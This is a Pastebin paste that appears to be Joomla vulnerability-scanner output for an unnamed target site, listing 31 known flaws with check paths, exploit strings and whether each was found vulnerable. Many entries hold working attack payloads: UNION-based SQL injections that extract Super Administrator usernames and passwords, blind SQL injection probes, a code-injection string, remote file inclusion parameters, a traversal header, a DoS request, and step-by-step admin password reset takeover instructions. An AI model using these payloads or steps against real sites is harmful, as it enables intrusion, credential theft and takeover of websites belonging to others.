This week only. Pastebin PRO Accounts Christmas Special! Don't miss out!Want more features on Pastebin? Sign Up, it's FREE!
Guest

Untitled

By: a guest on Jul 9th, 2011  |  syntax: None  |  size: 8.72 KB  |  views: 3,636  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Vulnerabilities Discovered
  2. ==========================
  3.  
  4. # 1
  5. Info -> Generic: htaccess.txt has not been renamed.
  6. Versions Affected: Any
  7. Check: /htaccess.txt
  8. Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
  9. Vulnerable? Yes
  10.  
  11. # 2
  12. Info -> Generic: Unprotected Administrator directory
  13. Versions Affected: Any
  14. Check: /administrator/
  15. Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
  16. Vulnerable? N/A
  17.  
  18. # 3
  19. Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
  20. Versions effected: 1.5.11 <=
  21. Check: /libraries/phpxmlrpc/xmlrpcs.php
  22. Exploit: /libraries/phpxmlrpc/xmlrpcs.php
  23. Vulnerable? No
  24.  
  25. # 4
  26. Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
  27. Versions effected: 1.5.12 <=
  28. Check: /libraries/joomla/utilities/compat/php50x.php
  29. Exploit: /libraries/joomla/utilities/compat/php50x.php
  30. Vulnerable? No
  31.  
  32. # 5
  33. Info -> Core: Authentication Bypass Vulnerability
  34. Versions effected: Joomla! 1.5.3 <=
  35. Check: /administrator/
  36. Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
  37. Vulnerable? No
  38.  
  39. # 6
  40. Info -> Core: joomla.php Remote File Inclusion Vulnerability
  41. Versions effected: 1.0.0
  42. Check: /includes/joomla.php
  43. Exploit: /includes/joomla.php?includepath=
  44. Vulnerable? No
  45.  
  46. # 7
  47. Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
  48. Versions effected: 1.0.13 <=
  49. Check: /administrator/
  50. Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
  51. Vulnerable? Yes
  52.  
  53. # 8
  54. Info -> Core: Path Disclosure Vulnerability
  55. Versions effected: Joomla! 1.5.12 <=
  56. Check: /libraries/joomla/utilities/compat/php50x.php
  57. Exploit: /libraries/joomla/utilities/compat/php50x.php
  58. Vulnerable? No
  59.  
  60. # 9
  61. Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
  62. Versions effected: Joomla! 1.5.8 <=
  63. Check: /plugins/editors/xstandard/attachmentlibrary.php
  64. Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to  /plugins/editors/xstandard/attachmentlibrary.php
  65. Vulnerable? No
  66.  
  67. # 10
  68. Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
  69. Versions effected: Joomla! 1.5.0 Beta/Stable
  70. Check: /libraries/phpmailer/phpmailer.php
  71. Exploit: N/A
  72. Vulnerable? No
  73.  
  74. # 11
  75. Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
  76. Versions effected: Joomla! 1.5.12
  77. Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
  78. Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
  79. Vulnerable? Yes
  80.  
  81. # 12
  82. Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
  83. Versions Affected: 1.5.5 <=
  84. Check: /components/com_user/controller.php
  85. Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password
  86. Vulnerable? No
  87.  
  88. # 13
  89. Info -> CoreComponent: com_content SQL Injection Vulnerability
  90. Version Affected: Joomla! 1.0.0 <=
  91. Check: /components/com_content/
  92. Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
  93. Vulnerable? No
  94.  
  95. # 14
  96. Info -> CoreComponent: com_search Remote Code Execution Vulnerability
  97. Version Affected: Joomla! 1.5.0 beta 2 <=
  98. Check: /components/com_search/
  99. Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
  100. Vulnerable? No
  101.  
  102. # 15
  103. Info -> CoreComponent: com_admin File Inclusion Vulnerability
  104. Versions Affected: N/A
  105. Check: /administrator/components/com_admin/admin.admin.html.php
  106. Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
  107. Vulnerable? No
  108.  
  109. # 16
  110. Info -> CoreComponent: MailTo SQL Injection Vulnerability
  111. Versions effected: N/A
  112. Check: /components/com_mailto/
  113. Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
  114. Vulnerable? No
  115.  
  116. # 17
  117. Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
  118. Versions effected: Joomla! 1.5.0 RC3
  119. Check: /components/com_content/
  120. Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
  121. Vulnerable? No
  122.  
  123. # 18
  124. Info -> CoreComponent: com_content XSS Vulnerability
  125. Version Affected: Joomla! 1.5.7 <=
  126. Check: /components/com_content/
  127. Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
  128. Vulnerable? No
  129.  
  130. # 19
  131. Info -> CoreComponent: com_weblinks XSS Vulnerability
  132. Version Affected: Joomla! 1.5.7 <=
  133. Check: /components/com_weblinks/
  134. Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
  135. Vulnerable? No
  136.  
  137. # 20
  138. Info -> CoreComponent: com_mailto Email Spam Vulnerability
  139. Version Affected: Joomla! 1.5.6 <=
  140. Check: /components/com_mailto/
  141. Exploit: The mailto component does not verify validity of the URL prior to sending.
  142. Vulnerable? No
  143.  
  144. # 21
  145. Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
  146. Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
  147. Check: /components/com_content/
  148. Exploit: Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archive
  149. Vulnerable? No
  150.  
  151. # 22
  152. Info -> CoreComponent: com_content XSS Vulnerability
  153. Version Affected: Joomla! 1.5.9 <=
  154. Check: /components/com_content/
  155. Exploit: A XSS vulnerability exists in the category view of com_content.
  156. Vulnerable? No
  157.  
  158. # 23
  159. Info -> CoreComponent: com_installer CSRF Vulnerability
  160. Versions effected: Joomla! 1.5.0 Beta
  161. Check: /administrator/components/com_installer/
  162. Exploit: N/A
  163. Vulnerable? No
  164.  
  165. # 24
  166. Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
  167. Versions effected: Joomla! 1.5.0 Beta
  168. Check: /components/com_search/
  169. Exploit: N/A
  170. Vulnerable? No
  171.  
  172. # 25
  173. Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
  174. Versions effected: 1.0.7 <=
  175. Check: /components/com_poll/
  176. Exploit: Send request  /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
  177. Vulnerable? No
  178.  
  179. # 26
  180. Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
  181. Versions effected: N/A
  182. Check: /components/com_banners/
  183. Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
  184. Vulnerable? No
  185.  
  186. # 27
  187. Info -> CoreComponent: com_mailto timeout Vulnerability
  188. Versions effected: 1.5.13 <=
  189. Check: /components/com_mailto/
  190. Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
  191. Vulnerable? Yes
  192.  
  193. # 28
  194. Info -> Component: JCE XSS+File Inclusion Vulnerability
  195. Versions Affected: 1.0.4<=
  196. Check: /components/com_jce/
  197. Exploit: 1) Input passed to the "img", "title", "w", and "h" parameters within jce.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.  2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources.
  198. Vulnerable? No
  199.  
  200. # 29
  201. Info -> Component: CHRONOContact File Inclusion Vulnerability
  202. Versions effected: N/A
  203. Check: /administrator/components/com_chronocontact/excelwriter/PPS/File.php
  204. Exploit: /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
  205. Vulnerable? No
  206.  
  207. # 30
  208. Info -> Component: com_knowledgebase addon FCKEditor Abuse of Functionalities Vulnerability
  209. Versions effected: 2.6.1.4 <=
  210. Check: /components/com_knowledgebase/fckeditor/fckeditor.js
  211. Exploit: Certain versions of FCKeditor have multiple security vulnerabilities.
  212. Vulnerable? N/A
  213.  
  214. # 31
  215. Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
  216. Version Affected: 2.6 <=
  217. Check: /administrator/components/
  218. Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
  219. Vulnerable? No
  220.  
  221. There are 4 vulnerable points in 31 found entries!
clone this paste RAW Paste Data